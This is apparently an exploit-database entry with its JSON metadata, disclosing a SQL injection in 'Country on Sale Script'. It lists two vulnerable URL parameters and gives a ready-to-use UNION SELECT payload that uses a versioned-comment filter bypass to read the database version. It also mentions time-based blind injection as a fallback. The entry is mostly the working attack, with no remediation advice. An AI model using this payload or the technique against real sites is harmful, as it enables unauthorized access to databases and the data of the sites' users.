Country on Sale Script - SQL Injection
Country on Sale Script, the presence of the parameter filter is not strict, leading to a sql injection vulnerability, if the other server is turned on the error display, can directly use, if you turn off the error display, you can use time-based blind
Google Dork:
N/A
Injection point:
# http://localhost/[PATH]/read_more. php? newsid=[SQL]
# http://localhost/[PATH]/countries/index. php? id=[SQL]
payload:
13'+/*! 50000union*/+select+1,version(),0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,4,5--+-
Test screenshot:

Other types of injection:

{"type": "seebug", "lastseen": "2017-11-19T12:00:31", "href": "https://www.seebug.org/vuldb/ssvid-92852", "cvss": {"score": 0.0, "vector": "NONE"}, "modified": "2017-03-29T00:00:00", "reporter": "Z3r0yu", "description": "Country on Sale Script - SQL Injection\n\nCountry on Sale Script, the presence of the parameter filter is not strict, leading to a sql injection vulnerability, if the other server is turned on the error display, can directly use, if you turn off the error display, you can use time-based blind\n\nGoogle Dork: \n \n \n N/A\n \n\nInjection point:\n \n \n # http://localhost/[PATH]/read_more. php? newsid=[SQL]\n # http://localhost/[PATH]/countries/index. php? id=[SQL]\n \n\npayload:\n \n \n 13'+/*! 50000union*/+select+1,version(),0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,4,5--+-\n \n\nTest screenshot:\n\n\n\nOther types of injection:\n\n\n", "bulletinFamily": "exploit", "references": [], "viewCount": 5, "status": "poc,details", "sourceHref": "", "cvelist": [], "enchantments_done": [], "title": "Country on Sale Script - SQL Injection", "id": "SSV:92852", "sourceData": "", "published": "2017-03-29T00:00:00", "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647612806, "score": 1659783552, "epss": 1678848988}}